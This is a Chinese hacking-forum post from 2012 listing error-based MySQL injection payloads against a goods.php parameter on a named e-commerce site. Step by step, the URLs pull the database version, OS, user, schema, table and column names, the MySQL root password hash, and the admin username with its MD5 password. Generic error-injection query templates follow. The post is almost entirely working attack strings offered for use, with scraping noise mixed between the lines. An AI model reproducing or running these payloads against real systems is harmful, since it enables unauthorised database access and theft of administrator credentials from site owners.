找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2225|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号
1 O" Q+ ~3 g* }9 m1 l, Yhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
6 g  ^9 s3 O& Q1 e4 Q, h" g. R5 X# Q% |* M2 ]
判断系统
  Z, I1 M6 I( ^3 _& U: Y' X* h2 f- f$ T  B
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
* m. a, G% q3 }* O3 Z. q# i$ b, q, i7 Z/ \0 ]4 `# e7 _% l% _
$ o8 E5 ]( w  `7 e) m+ H8 K: k

9 t+ ?5 K4 v. Z' K  m. S, ?当前 user()
1 o9 J- ~7 H* I# ^. A( _1 l& a# }  ^( [8 a6 J  G
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%235 X& H: n! s6 s+ Y6 S

+ d* S% q8 T# L) v% u) L; V1 b( e8 ^1 [
+ N# r* J- r2 w6 M
1 h* \3 a  J' u' X当前 database()! X% x) p% L2 _# j+ ?' Y8 D' J$ W5 |
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
7 j' V5 W# J$ r. W# Q# ?' r1 g% q7 Z; ]; `, v6 p- u6 ^# \
  j1 t' N$ V6 w8 U* {. ^

5 z" E" p$ T' U) W! @9 Z
  g1 ]* I# x+ h* J* @" S/ Aroot hash
8 G; ?9 ?$ r8 I& e) W& q" U  [5 n; E0 Y, T  a/ t' g. ]
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
+ W/ R( D% \: k% c& J4 V+ P) b; Y$ S" x: M, }$ v

* z, J- V5 o0 J) X7 f( u+ w- j- E8 U8 l+ ]
当前 数据库表名
* X& B& w- Q' \/ L9 _7 G8 S6 [; l) P# V
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
0 [; A4 @& m8 n' n% N
  {9 q! D+ P  _/ s* n7 Y  n6 G. y9 l. L( z9 J. x, x
9 C, s( n% L( q4 O4 `
当前 数据库 user_name 字段5 W1 }5 X) C/ n/ X; A+ R: S

- n" E7 H0 @% ], Shttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23* W4 ^& r0 o' t4 e- n9 w2 M

: U, k/ ]% [& u当前 数据库 字段 password1 `9 g0 m" h; ?" d
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23! \$ \# A1 |8 z

2 F$ N: A' ?) B( a! Q& @! D, y
0 G, ~! B8 J% j4 b, }& B8 r) V/ k7 z6 W$ s( q6 R. \
获得 admin passwd(md5)
4 O. i5 p2 s. p- ~4 I: }- k/ R/ U1 M" j& g; s" ^, s

; O2 p- d1 a' v( x; P, O$ Mhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23" J5 ?' ?' p. F6 s; _) g2 k; ?

4 @  y% d  Q5 h( ]3 D% q  {$ C报错注射  H1 F/ N9 u9 B: g: m
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
. N% M3 X4 r4 F2 w1 O$ @) d) |+ O5 R% @: a; t) T
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
; H  w: H8 @' W. T+ W) |2 F3 y0 Y# h! R7 T2 ~: J4 ^
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表